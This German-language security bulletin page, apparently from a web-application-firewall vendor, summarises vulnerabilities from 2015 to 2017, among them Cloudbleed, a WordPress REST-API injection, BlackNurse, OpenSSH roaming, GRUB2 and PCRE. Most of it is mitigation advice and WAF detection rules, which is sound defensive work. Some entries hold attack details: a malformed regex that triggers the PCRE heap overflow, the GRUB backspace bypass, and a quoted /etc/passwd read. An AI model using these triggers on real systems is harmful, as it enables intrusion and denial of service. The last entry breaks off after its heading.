News

SB 17.02 :: CloudFlare-Bug erlaubt das Auslesen sensibler Daten

2017.02.24

Ein Fehler bei Cloudflare erlaubte monatelang das Auslesen sensibler Daten, wenn Cloudflare als CDN oder ReverseProxy benutzt wurde. Damit konnten Angreifer u.a. Sessioncookies oder Anmeldedaten monatelang auslesen.

Ein Statement von Cloudflare zu dem Bug:

It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines.

Eine Einschätzung von einem reddit-user:

The data that cloudflare leaked was mixed in with standard web content. This means that sensitive data from one site was randomly intermixed with data from other sites, in a recoverable fashion. Because of the nature of webcontent, it can be cached for a long time, notably by search engines. This means that sensitive data such as passwords and credit card numbers may be currently stored in a way anyone can see if they search correctly.

This affects many sites, definitely including ones you use.

Tavis Ormandy von Projekt Zero hat den Fehler am 18.02. gemeldet, der innerhalb von 2 Tagen geschlossen wurde. Cloudflare-User haben eine Liste betroffener Seiten zusammengestellt, hier eine Liste der German Top 500 Webseiten,

German Top 500 Sites @ Cloudflare

   > www.kinox.to 
   > www.movie4k.to 
   > www.mydealz.de 
   > www.heftig.co 
   > www.dawanda.com 
   > www.mozilla.org 
   > www.neobux.com 
   > www.yelp.de 
   > www.privatehomeclips.com 
   > www.chaturbate.com 
   > www.beeg.com 
   > www.promiflash.de 
   > www.kleiderkreisel.de 
   > www.bitshare.com 
   > www.share-links.biz 
   > www.deutsche-wirtschafts-nachrichten.de 
   > www.linkcrypt.ws 
   > www.share-online.biz 
   > www.urlaubspiraten.de 
   > www.bab.la 
   > www.mygully.com 
   > www.pcgameshardware.de 
   > www.serienjunkies.org 
   > www.hardsextube.com 
   > www.movie-blog.org 
   > www.sunmaker.com 
   > www.klicktel.de 
   > www.fiverr.com 
   > www.feedly.com 
   > www.pcgames.de 
   > www.gulli.com 
   > www.belboon.com 
   > www.goldesel.to 
   > www.hardwareluxx.de 
   > www.tradedoubler.com 

Referenzen




SB 17.01 :: Kritische Lücke in Wordpress-API erlaubt Artikeländerungen und Remote Code Execution

2017.02.01

wp-hack

Am 1. Februar veröffentlichte Sucuri Details zu einer kritischen Wordpress-Lücke, die es Angreifern ermöglicht, ohne Authentifizierung Artikel und Plugin-Einstellungen zu ändern und PHP-Code einzuschleusen, der dann zu einer Remote Code Execution führen kann.

Die Probleme bestehen in der REST-API von Wordpress, die mit der Version 4.4 im Dezember 2015 eingeführt wurde und per Default aktiviert ist.

Ein Angreifer kann durch manipulieren von GET- oder POST-Parametern beliebige Artikel ändern, um z.B. SEO-Spam einzufügen oder schadhaften Code einschleusen, der zur Infektion von Besuchern mit Viren oder Trojanern führen kann, im Worst-Case ist das Einschleusen von PHP-Code möglich.

Die Lücke aus folgenden Gründen als KRITISCH eingestuft:

  • von extern exploitbar
  • ohne Authentifizierung ausnutzbar
  • Angriffsvektoren ermöglichen Exploit-Kampagnen
  • Die REST-API ist per default aktiviert
  • ca 30% aller Webseiten sind Wordpress-Installationen

Detaillierte Beschreibungen der Lücke finden sich in den Blogs von Sucuri und Akamai

Bereits im Oktober gab es ein Advisory auf Hackerone, indem über Möglichkeiten berichtet wurde, via API unerlaubten Zugriff auf Userinformationen zu erlangen.

Gegenmaßnahmen

8ackProtect-Kunden sind durch die Hotpatching-Funktionalität der WAF bereits geschützt.

Wir empfehlen, sofern die Worpdress-API nicht intensiv genutzt wird, den Zugriff temporär komplett zu sperren. Die Lücke aus dem Oktober und die jetzige zeigen, dass Sicherheitsfeatures der API nicht ausgereift sind und wir erwarten, dass jetzt vermehrt Lücken gesucht und höchstwahrscheinlich auch gefunden werden.Präventiv, um den zu erwartenden Kampagnen vorzubeugen, sollte man also die API-Zugriffe serverseitig deaktivieren.

Benutzer der Naxsi-WAF können folgende Regeln aus dem Doxi-Rulesets anwenden, die bereits im Repository zu finden sind:

# block access to WP-API
MainRule  "str:/wp-json/wp/v2/" "msg:Wordpress REST-API Access" "mz:URL" "s:$ATTACK:8" id:42000461  ;

# GET-Exploit
MainRule negative "rx:^\d+$" "msg:WordPress API Content Injection (GET)" "mz:|$URL:/wp-json/wp/v2/posts/|$ARGS_VAR:id" "s:$ATTACK:8" id:42000460  ;

# POST-Exploit
MainRule negative "rx:^\d+$" "msg:WordPress API Content Injection (POST)" "mz:$URL:/wp-json/wp/v2/posts/|$BODY_VAR:id" "s:$ATTACK:8" id:42000459  ;

Zugriff auf die API blockieren / Nginx

location /wp-json/wp/v2 {

    return 404;

}

Zugriff auf die API blockieren / Apache

# mod_alias

Redirect 404 /wp-json/wp/v2

# mod_rewrite

RedirectMatch 404 /wp-json/wp/v2

Referenzen




SB 16.05 :: BlackNurse-Angriff setzt Firewalls ausser Gefecht

2016.11.11

black nurse

  • Update 1 / 14.11. PaloAlto-Advisory

BlackNurse Denial of Service Attack: "The 90's called and wanted their ICMP flood attack back" betitelten Forscher den Angriff, der am 10.11. unter dem Namen "Black Nurse bekannt wurde und der daraus besteht, ICMP-Pakete Type 3 Code 3 (Destination Unreachable / Port Unreachable) ans Ziel zu senden.

Der Angriff funktioniert bei geringer Bandbreite, wir haben in eigenen Tests durchgeführt und konnten mit 1MBit/s ANgriffsvolumen, geroutet durch TOR, verwundbare Systeme lahmlegen, die mit 100MBit und mehr angebunden waren.

Das TDC SOC eines dänischen Telekommunikationsproviders, dass den Angriff entdeckt und anlaysiert hat spricht von 15MBit/s Angriffsvolumen, mit dem erfolgreich 1 GIbt-angebundene Firewalls angegriffen wurden.

Betroffene Devices:

  • Cisco ASA 5506, 5515, 5525 (default settings)
  • Cisco ASA 5550 (Legacy) and 5515-X (latest generation) - (see detailed test results)
  • SonicWall - Misconfiguration can be changed and mitigated
  • Palo Alto
  • Cisco Router 897
  • Zyxel NWA3560-N (Wireless attack from LAN Side)
  • Zyxel Zywall USG50

Notizen zu den Cisco-Firewalls:

Both legacy and X-series - all legacy models <= 5550 and at least on all <= 5525-X in NG - but impact varies. Confirmed on firmware 9.1 (legacy) and 9.4 (X-series). Most likely an issue on all firmware versions. icmp deny on interface does not properly mitigate, only reduce impact. External throttling seems to be only proper mitigation AFAIK. A pitiful 1Mbps flood of type 3 code 4 results in 6% CPU on 5550 and 31% CPU on 5515-X. NG seems to be more vulnerable to this. All contexts are affected if in multi-mode.

Anmerkungen von PaloAlto

Impact: 1) Palo Alto Networks Next-Generation Firewalls drop ICMP requests by default, so unless you have explicitly allowed ICMP in a security policy, your organization is not affected and no action is required. 2) If you have explicitly allowed ICMP in a security policy and have implemented our best practices for flood protection, your organization is not affected and no action is required. 3) If you have explicitly allowed ICMP in a security policy and have not implemented our best practices for flood protection, your organization’s firewalls may experience higher CPU and memory usage, which may slow down the firewall’s response.

NICHT betroffen

  • Iptables (Netfilter! - thx Martin ;-)) (even with 480 Mbit/sek) don't care - LOVE LINUX!
  • OpenBSD 6.0 and current
  • Windows Firewalls
  • pfSense

Referenzen




SB 16.04 :: kritische XXE-Lücke in Typo3

2016.02.24

Das TYPO3-Security-Team hat in einem Advisory auf eine Lücke beim Verarbeiten von XML-Dateien hingewiesen, die u.U. das Ausführen beliebigen Codes (RemoteCodeExecution) und damit die Komplettübernahme des Webservers ermöglicht; Infos zu XXE-Lücken finden Sie in diesem Artikel auf owasp.org: XML External Entity (XXE) Processing

Im Gegensatz zum TYPO3-Team stufen wir die Lücke als kritisch ein, da TYPO3 auf vielen älteren Servern mit verwundbaren libxml - Versionen zum Einsatz kommt.


Betroffene Versionen:

  • 6.2.0 - 6.2.18
  • 7.6.0 - 7.6.3
  • libxml2 <= 2.9

Mitigations

Referenzen




SB 16.03 :: Rails Dynamic Render anfällig für Remote Code Execution (CVE-2016-0752)

2016.01.28

Sicherheitsforscher haben eine Analyse veröffentlicht, mit der bei einer kürzlich gefixten Lücke im Rails-Framework RCE und damit Vollzugriff auf den Server möglich ist.

Tl;dr: If your application uses dynamic render paths (eg: render params[:id]) then you are vulnerable to remote-code execution via local file inclusion. Update to the latest version of Rails, or refactor your controllers.

Der nVisium-Artikel beinhaltet einige Perlen und beschreibt im Detail, wie aus einer LFI-Lücke eine RCE-Lücke wird:

Our hacker instinct kicks in and we decide to pass in /etc/passwd as the template parameter, and confirm that we are actually able to read our passwd file. This is a huge concern.

Die Lücke wurde vor knapp einem Jahr, im Februar 2015 gemeldet, im Sommer 2015 bestätigt, aber erst jetzt gefixt.

Betroffene Versionen

Betroffene Versionen: Alle
Gefixte Versionen: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1

Mitigations

Patches stehen bereit

Eine aktuelle WAF wie z.B. Naxsi erkennt und blockt diese Angriffe.

rails-shell

Referenzen




SB 16.02 :: Bug im SSH-Client erlaubt Auslesen der clientseitigen Private-Keys ( CVE-2016-0777 CVE-2016-0778 )

2016.01.14

Ein kritischer Bug in OpenBSDs SSH-Client erlaubt es einem bösartigen Server, die Private Keys des Clients auszulesen. Das Problem besteht in einer experimentellen, undokumentierten Funktion "UseRoaming"; ein Auslesen der Keys via MitM ist nicht möglich.

Als Workaround empfiehl sich, die Oprion UseRoaming no in /etc/ssh/ssh_config oder ~/.ssh/config einzufügen

 * SECURITY: ssh(1): The OpenSSH client code between 5.4 and 7.1
   contains experimential support for resuming SSH-connections (roaming).

   The matching server code has never been shipped, but the client
   code was enabled by default and could be tricked by a malicious
   server into leaking client memory to the server, including private
   client user keys.

   The authentication of the server host key prevents exploitation
   by a man-in-the-middle, so this information leak is restricted
   to connections to malicious or compromised servers.

   MITIGATION: For OpenSSH >= 5.4 the vulnerable code in the client
   can be completely disabled by adding 'UseRoaming no' to the gobal
   ssh_config(5) file, or to user configuration in ~/.ssh/config,
   or by passing -oUseRoaming=no on the command line.

User, die ssh-agent benutzen sind nicht betroffen:

If you use ssh-agent(1), however, the man page offers some 
good news: The agent will never send a private key over its 
request channel. Instead, operations that require a private key 
will be performed by the agent, and the result will be
returned to the requester. This way, private keys are not 
exposed to clients using the agent

Mitigations

Updates stehen bereit; bis dahin hilft:

echo -e 'Host *\nUseRoaming no' >> /etc/ssh/ssh_config

oder 

echo -e 'Host *\nUseRoaming no' >>  ~/.ssh/ssh_config

Referenzen




SB 16.01 :: Backdoor in FortigateOS

2016.01.13

Auf Fulldisclosure ist ein Script aufgetaucht, mit dem sich eine Backdoor in FortiGate ausnutzen lässt; betroffen sind die Versionen 4.x - 5.0.7

fortigate-backdoor

In einer Diskussion auf reddit wurde diese Backdoor schnell bestätigt und auch ermittelt, welche Versionen betroffen sind:

  • 5.4 branch: not vulnerable
  • 5.2 branch: not vulberable
  • 5.0 branch: vulnerable up to 5.0.7, then not vulnerable
  • 4.3 branch: vulnerable up to 4.3.16, then not vulnerable (ie 4.3.17 and 4.3.18 are not vulnerable)
  • 4.0 branch: vulnerable

FortiNet hat daraufhin ein Advisory veröffentlicht, indem vor dieser Backdoor gewarnt wird.

Workarounds:

Folgende Workarounds werden von FortiNet empfohlen:

  • Disable admin access via SSH on all interfaces, and use the Web GUI instead, or the console applet of the GUI for CLI access.

  • If SSH access is mandatory, in 5.0 one can restrict access to SSH to a minimal set of authorized IP addresses, via the Local In policies.

Referenzen




SB 15.20 :: Burg in Grub2 erlaubt Authentication-Bypass

2015.12.15

Eine Lücke im Linux-Bootloader GRUB2 erlaubt es einem lokalen Angreifer, eingestellte Authentifizierungen zum Umgehen und das System im Rescue-Modus zu starten:

An attacker which successfully exploits this vulnerability will obtain a Grub rescue shell. Grub rescue is a very powerful shell allowing to: - Elevation of privilege: The attacker is authenticated without knowing a valid username nor the password. The attacker has full access to the grub's console (grub rescue). - Information disclosure: The attacker can load a customized kernel and initramfs (for example from a USB) and then from a more comfortable environment, copy the full disk or install a rootkit. - Denial of service: The attacker is able to destroy any data including the grub itself. Even in the case that the disk is ciphered the attacker can overwrite it, causing a DoS.

Test

To quickly check if your system is vulnerable, when the Grub ask you the username, press the Backspace 28 times. If your machine reboots or you get a rescue shell then your Grub is affected.

Nach Aussage der Entdecker der Lücke ist der Bug und der dazugehörende Exploit nicht generisch sondern muss an das jeweilige Setup angepasst werden (phew!)

Mitigations

Updates stehen momentan (2015-12-15) noch nicht bereit.

Referenzen




SB 15.19 :: Kritischer Bug in XEN erlaubt Host-Übernahme (CVE-2015-7835 )

2015.10.30

Das XEN Team hat in einem Advisory vor einer Lücke gewarnt, die einem Angreifer aus einem Gastsystem die komplette Übernahme des XEN-Hosts erlaubt. Betroffen sind alle Xen-Version von 3.4 aufwärts, die ParaVirtualisierung (PV) unter x86 - Systemen einsetzen; HVM-Systeme oder XEN-Installationen auf ARM sind nicht betroffen.

Malicious PV guest administrators can escalate privilege so as to control the whole system. Xen 3.4 and onward are vulnerable. Only x86 systems are vulnerable. ARM systems are not vulnerable. Only PV guests can exploit the vulnerability. Both 32-bit and 64-bit PV guests can do so.

Qubes hat eine weitere Analyse und technische Beschreibung der Lücke.

Patches und Updates stehen bereit.

Referenzen




SB 15.18 :: Wordpress - Update schließt kritische Lücken

2015.09.16

tl;dr: dringendes Patching empfohlen.

Mit dem Release von WordPress 4.3.1 werden mehrere Sicherheitslücken geschlossen, die es einem Angreifer über meherer Stages hinweg erlauben, via XSS und Priviledge Escalation SQL-Injections auszuführen und damit Wordpress-Blogs komplett zu übernehmen.

Weitere Details liefert Checkpoint in einer 3-teiligen Blog-Serie, deren letzter Teil: Finding Vulnerabilities in Core WordPress: A Bug Hunter’s Trilogy, Part III – Ultimatum gerade erschienen ist und der weitere Details zu den Lücken und dem Schadpotential liefert:

In this series of blog posts, Check Point vulnerability researcher Netanel Rubin tells a story in three acts – describing his long path of discovered flaws and vulnerabilities in core WordPress, leading him from a read-only ‘Subscriber’ user, through creating, editing and deleting posts, and all the way to performing SQL injection and persistent XSS attacks on 20% of the popular web.

Referenzen




SB 15.17 :: Lücke in BIND ermöglicht DOS - Angriffe (CVE-2015-5722)

2015.09.03

In einem Adivsory warnt das ISC erneutet vor einem Bug, der zum Absturz des BIND führen kann (DOS). Betroffen sind Resolver und autoritative Server, die DNSSEC-Anfragen überprüfen.

Description:

Parsing a malformed DNSSEC key can cause a validating resolver to exit due to a failed assertion in buffer.c. It is possible for a remote attacker to deliberately trigger this condition, for example by using a query which requires a response from a zone containing a deliberately malformed key.

Impact:

Recursive servers are at greatest risk but an authoritative server could be affected if an attacker controls a zone the server must query against to perform its zone service.

Servers which are affected may terminate with an assertion failure, causing denial of service to all clients.

Workarounds:

Servers which are not performing validation are not at risk from this defect (but are at increased risk from other types of DNS attack.) ISC does not recommend disabling validation to deal with this issue; upgrading to a fixed version is the preferred solution.

Active exploits:

None known

Solution:

Upgrade to the patched release most closely related to your current version of BIND. These can all be downloaded from http://www.isc.org/downloads.

Debian, RedHat und FreeBSD stellen bereits Updates bereit; es wird ausdrücklich davor gewarnt, die DNSSEC-Validation abzustellen.

Gefunden wurde die Lücke von Hanno Böck vom Fuzzing-Project, in einem Artikel (BIND Denial of Service via malformed DNSSEC key (CVE-2015-5722) (Fuzzing Project)) werden Einzelheiten zur Lücke erklärt.

Referenzen




SB 15.16 :: PCRE: Remote Code Execution Lücke gefixt

2015.08.12

In der PCRE-Library wurde ein Bug gefixt, der einem Angreifer Remote Code Execution ermöglichte, wenn dieser die Regular-Expression beeinflussen kann.

PCRE library is prone to a vulnerability which leads to Heap Overflow. During the compilation of a malformed regular expression, more data is written on the malloced block than the expected size output by compile_regex. Exploits with advanced Heap Fengshui techniques may allow an attacker to execute arbitrary code in the context of the user running the affected application.

Mitigations

Updates für die Distributionen wird in den nächsten Tagen erwartet, für WebApplicationFirewalls auf Nginx/Naxsi-Basis haben wir eine Signatur für die Doxi-Rules veröffentlicht:

MainRule  "str:(?J:(?|(:(?|(?'R')(\k'R')|((?'R')))H'Rk'Rf)|s(?'R'))))" "msg:PCRE  Library Heap Overflow Vulnerability " "mz:BODY|ARGS|HEADERS" "s:$ATTACK:8" id:42000436  ;

Referenzen




SB 15.15 :: Lücke in BIND ermöglicht DOS - Angriffe (CVE-2015-5477)

2015.07.30

ISC hat ein Advisory zu einer Lücke in BIND herausgegeben, die einem Angreifer eine DOS-Attacke auf BIND-Server ermöglicht. Nach Aussage eines ISC-Mitarbeiters reicht dazu ein einzelnes Paket, der Angriff ist also sehr einfach durchzuführen, mit Exploits ist demnächst zu rechnen.

Betroffen sind alle Versionen, Workarounds sind nicht möglich, Erkennung durch IDS/Firewalls ist schwierig.

Almost all unpatched BIND servers are potentially vulnerable. We know of no configuration workarounds. Screening the offending packets with firewalls is likely to be difficult or impossible unless those devices understand DNS at a protocol level and may be problematic even then.

Updates der Distributionen stehen bereit.

Ressourcen




SB 15.14 :: Bug in OpenSSH erlaubt Brute-Force-Angriffe (MaxAuthTries bypass)

2015.07.21

KingCope hat einen Bug in OpenSSH gefunden und veröffentlicht, der es einem Angreifer ergmöglicht, die Login-Grace-Time zu umgehen und beliebig viele Passwörter in kurzer Zeit durchzutesten; dies kann u.U. auch zu einem DoS-Angriff genutzt werden:

With this vulnerability an attacker is able to request as many password prompts limited by the “login graced time” setting, that is set to two minutes by default.

The crucial part is that if the attacker requests 10000 keyboard-interactive devices openssh will gracefully execute the request and will be inside a loop to accept passwords until the specified devices are exceeded.

Patches stehen zu diesem Zeitpunkt (20.07.2015) noch nicht bereit

Mitigations (und Best Practices)

  • Freigabe von SSH-Logins/Ports nur für definierte IPs (Firewall)
  • deaktivieren passwordbasierter Logins und Nutzen von SSH-Keys
  • beim Einsatz von Tools wie Fail2ban und Denyhosts sollte bedacht werden, dass diese nicht IPv6 - fähig und dementsprechend einfach zu umgehen sind

  • die folgenden Einstellungen verhindern passwortbasierte Logins vollständig; vor einem Einsatz sollte aber sichergestellt sein, dass keybasierte Logins aktiviert und möglich sind

# /etc/ssh/sshd_config

# active pubkeys
RSAAuthentication yes
PubkeyAuthentication yes


# deactivate passwords and keyboards
ChallengeResponseAuthentication no
KbdInteractiveAuthentication no
PasswordAuthentication no

Referenzen




SB 15.13 :: Remote Code Execution in Groovy, ElasticSearch ( CVE-2015-3253 )

2015.07.18

Das Groovy-Team hat eine Remote-Code-Execution-Lücke geschlossen; das zugehörige Advisory hat weitere Details.

When an application has Groovy on classpath and that it uses standard Java serialization mechanims to communicate between servers, or to store local data, it is possible for an attacker to bake a special serialized object that will execute code directly when deserialized. All applications which rely on serialization and do not isolate the code which deserializes objects are subject to this vulnerability.

Betroffen sind alle Versionen von 1.7.0 bis 2.4.3, in der vor kurzem veröffentlichten Version 2.4.4 ist die Lücke geschlossen.

Elasticsearch ist von dieser Lücke betroffen und veröffentlich die Version 1.6.1, in der diese Lücke geschlossen ist. Updates sollten dringend eingespielt werden, da die Lücke ausnutzbar ist, selbst wenn Dynamic Scripting deaktiviert ist, wie seit dem Release 1.4.0 üblich:

Deployments are vulnerable even when Groovy dynamic scripting is disabled.

Mitigations

Das Groovy-Team empfiehlt folgenden Workaround, wenn Updates nicht möglich sind:

If you cannot upgrade or rely on an older, unsupported version of Groovy, you can apply the following patch on the MethodClosure class (src/main/org/codehaus/groovy/runtime/MethodClosure.java):

 public class MethodClosure extends Closure {
+    private Object readResolve() {
+        throw new UnsupportedOperationException();
+    }

Referenzen




SB 15.12 :: OpenSSL - Update schließt MITM-Lücke (Alternative chains certificate forgery CVE-2015-1793)

2015.07.09

Das OpenSSL-Team hat ein Advisory veröffentlicht, indem vor einer Lücke in OpenSSL gewarnt wird, mit der ein MITM-Angreifer beliebige Zertifikate unterschieben kann:

Severity: High

During certificate verification, OpenSSL (starting from version 1.0.1n and 1.0.2b) will attempt to find an alternative certificate chain if the first attempt to build such a chain fails. An error in the implementation of this logic can mean that an attacker could cause certain checks on untrusted certificates to be bypassed, such as the CA flag, enabling them to use a valid leaf certificate to act as a CA and "issue" an invalid certificate.

This issue will impact any application that verifies certificates including SSL/TLS/DTLS clients and SSL/TLS/DTLS servers using client authentication.

Betroffen sind die OpenSSL-Versionen 1.0.2c, 1.0.2b, 1.0.1n und 1.0.1o.

Die großen Linux-Distros (RedHat, Debian, Ubuntu, SuSE) sind nicht betroffen, da diese ältere OpenSSL-Versionen benutzen; wer aber OpenSSL im ersten Halbjahr 2015 von der OpenSSL-Seiter heruntergeladen hat, sollte seine Version überprüfen und ggfs updaten.

Weiterhin nicht betroffen ist die Browser <-> Webserver-Kommunikation, da Browser meist eigene SSL-Libraries benutzen, dafür aber Server <-> Server-Kommunikation wie z.B. Mailserver, die sich per TLS unterhalten oder Server, die sich per Client-Zertifikaten authentifizieren.

Da aber nur Versionen betroffen sind, die momentan bei den großen Distributionen nicht benutzt werden, wird der Impakt als gering eingestuft.

Referenzen




SB 15.11 :: Lücke in PCRE-Bibliothek erlaubt Remote Code Execution (CVE-2015-3210)

2015.06.05

Auf der ossec-ml wurde vor einem Bug in der PCRE-Library gewarnt, der es einem entfernten Angreifer u.U. ermöglicht, Code mit den Rechten der angegriffenen Applikation auszuführen; der Exim-Bugtracker hat mehr Details:

PCRE library is prone to a vulnerability which leads to Heap Overflow. During the compilation of a malformed regular expression, more data is written on the malloced block than the expected size output by compile_regex. Exploits with advanced Heap Fengshui techniques may allow an attacker to execute arbitrary code in the context of the user running the affected application.

PCRE wird von vielen Servern und Diensten benutzt, u.a. alle Webserver/ReverseProxies (Apache, Nginx, HAProxy), Mailserver, aber auch IDS wie Snort und Suricata, die in vielen Firewalls zum Einsatz kommen. Des weiteren hat jede Programmiersprache eigene PCRE-Funktionen, die meist von der PCRE-Library zur Verfügung gestellt werden.

Wir rechnen mit verschiedenen, applikationsspezifischen Exploits in nächster Zeit, da ein funktionierender POC (siehe Tests, unten) im Advisory beschrieben ist.

Updates

  • 2015-06-06: Debian 6/7 (Oldstable und Squeeze LTS) sind, entgegen der erste veröffentlichten Version, nicht von der Lücke betroffen (src)

Mitigations

  • momentan (Stand: 04.Juni 22:00 CET) warten wir noch auf Updates der Linux-Distros; ein Patch für PCRE ist bereits verfügbar; es wird dringend angeraten, die alsbald erwarteten Patches umgehend einzuspielen

  • Signatur für Naxsi:

MainRule  "str:(?p=b)((?p=b)(?j:(?p<b>c)(?p<b>a(?p=b)))>wgxcredits)" "msg:PCRE  Library Heap Overflow Vulnerability" "mz:BODY|ARGS|HEADERS" "s:$ATTACK:8" id:42000432  ;
  • an einer Signatur für Snort wird momentan gearbeitet

Test

  • lokal
[ mex@odysseus :~] > pcretest 
PCRE version 8.36 2014-09-26

  re> /^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/
Failed: internal error: code overflow at offset 53
  re> 
  • der im Advisory verlinkte POC für PHP konnte von uns nicht nachvollzogen werden

Referenzen




SB 15.10 :: DH-Ciphers erlauben u.U. Downgrade (Logjam)

2015.05.20

Eine Lücke in der TLS-Implementierung der Diffie-Hellman-Cipher-Suites ermöglicht einem Angreifer u.U., ein Downgrade der TLS-Verbindung zu initiieren, um die Verbindung auf eine schwache und leicht zu knackende Verbindung zu zwingen. Als Name für die Lücke wurde "Logjam" gewählt.

Aus dem Advisory:

The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. The attack affects any server that supports DHE_EXPORT ciphers, and affects all modern web browsers. 8.4% of the Top 1 Million domains were initially vulnerable.

Ein detailliertes Paper "Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice" erklärt die näheren, technischen Details der Schwachstelle.

Ähnlich wie beider der FREAK-Attacke sind Admins, die sich an gängige Best-Practice-Verfahren halten, nicht von der Lücke betroffen, da DHE_EXPORT-Ciphers in normalen SSL/TLS-Setups nicht aktiviert sind.

Ein Artikel auf Golem.de beleuchtet die Hintergründe und Implikationen der Lücke.

Tests und Mitigations

Tests:

Mitigations

  • eine umfangreiche Liste mit Konfigurationsoptionen für populäre Reverse-Proxies sowie Web- und Mailserver findet sich auf weakdh.org/sysadmin.html

  • deaktivieren eventuell aktivierter DHE_EXPORT-Ciphers

  • alle weiter empfohlenen Schritte können u.U. zu Inkompatibilitäten mit älteren Clients führen, da z.B. Java6/7 und ältere Browser mit ECDHE-Ciphers und 2048-Bit-DH-Parametern Probleme bereiten ; nach Implementieren der entsprechenden Mitigations sollte man auf jeden Fall umfangreich testen

  • Aktivieren von ECDHE-Ciphers als präferierte Cipher-Suiten; dies würde auf jeden Fall moderne Browser vor der Lücke schützen

  • Deaktivieren von DH-Ciphers
  • serverseitig Generieren einer eigenen, starken DH-Group, da per default eine eingebaute DH-Group benutzt wird
openssl dhparam -out /etc/ssl/dhparams.pem 2048 
  • nginx
ssl_dhparam /etc/ssl/dhparams.pem; 
ssl_prefer_server_ciphers on;

# logjam-approved ciphers
ssl_ciphers 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA';
  • Apache (DHParameters erst ab 2.4.7, siehe auch ServerFault)
SSLOpenSSLConfCmd DHParameters "/etc/ssl/dhparams.pem"

SSLProtocol             all -SSLv2 -SSLv3

SSLCipherSuite          ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA

SSLHonorCipherOrder     on

Auswirkungen

Nach Aussage der Entdecker der Lücke kann selbige benutzt werden, um in VPN-Verbindungen einzubrechen, zumindest wenn der Angreifer auf Staatsebene zu finden ist:

Websites that use one of a few commonly shared 1024-bit Diffie-Hellman groups may be susceptible to passive eavesdropping from an attacker with nation-state resources. Here, we show how various protocols would be affected if a single 1024-bit group were broken in each protocol, assuming a typical up-to-date client (e.g., most recent version of OpenSSH or up-to-date installation of Chrome).

lj1

lj2

Referenzen




SB 15.09 :: QEMU - Lücke erlaubt Ausbruch aus virtuellen Maschinen (VENOM, CVE-2015-3456)

2015.05.14

Crowdstrike hat ein Advisory veröffentlich, indem vor einer Lücke im QEMU-Floppy-Driver gewarnt wird, durch die aus virtuellen Maschinen ausgebrochen und auf das Host-System und andere virtuelle Maschinen zugegriffen werden kann.

Wir haben unsere eigenen Systeme überprüft und gesehen, dass bei KVM-Installationen auf Debian und SLES keine Floppy-Laufwerke angelegt werden und der Bug damit höchstwahrscheinlich nicht ausnutzbar ist. Nach Aussage von Crowdstrike ist der Bug bei XEN aber auch dann ausnutzbar, wenn explizit kein Floppy-Drive angelegt wird.

POCs oder Exploits-in-the-wild sind bisher nicht bekannt.

Betroffen sind:

  • XEN
  • KVM, sofern Floppy-Drives benutzt werden
  • QEMU-Virtualisierungen

Ausdrücklich nicht betroffen sind

  • VMWare
  • Microsoft Hyper-V (Azure-Cloud)
  • Docker
  • Bochs
  • Amazon AWS (Quelle

Crowdstrike beschreibt die Lücke wie folgt:

The guest operating system communicates with the FDC by sending commands such as seek, read, write, format, etc. to the FDC’s input/output port. QEMU’s virtual FDC uses a fixed-size buffer for storing these commands and their associated data parameters. The FDC keeps track of how much data to expect for each command and, after all expected data for a given command is received from the guest system, the FDC executes the command and clears the buffer for the next command.

This buffer reset is performed immediately at the completion of processing for all FDC commands, except for two of the defined commands. An attacker can send these commands and specially crafted parameter data from the guest system to the FDC to overflow the data buffer and execute arbitrary code in the context of the host’s hypervisor process.

venom

Mitigations

Alle großen Distributionen stellen Updates bereit, Provider wie Linode, Rackspace oder Digital OCean wurden im Vorfeld informiert.

Referenzen




SB 15.08 :: Bug in Microsofts HTTP.sys erlaubt Remote Code Execution (MS15-034, CVE-2015-1635) (Update 2)

2015.04.15

Update


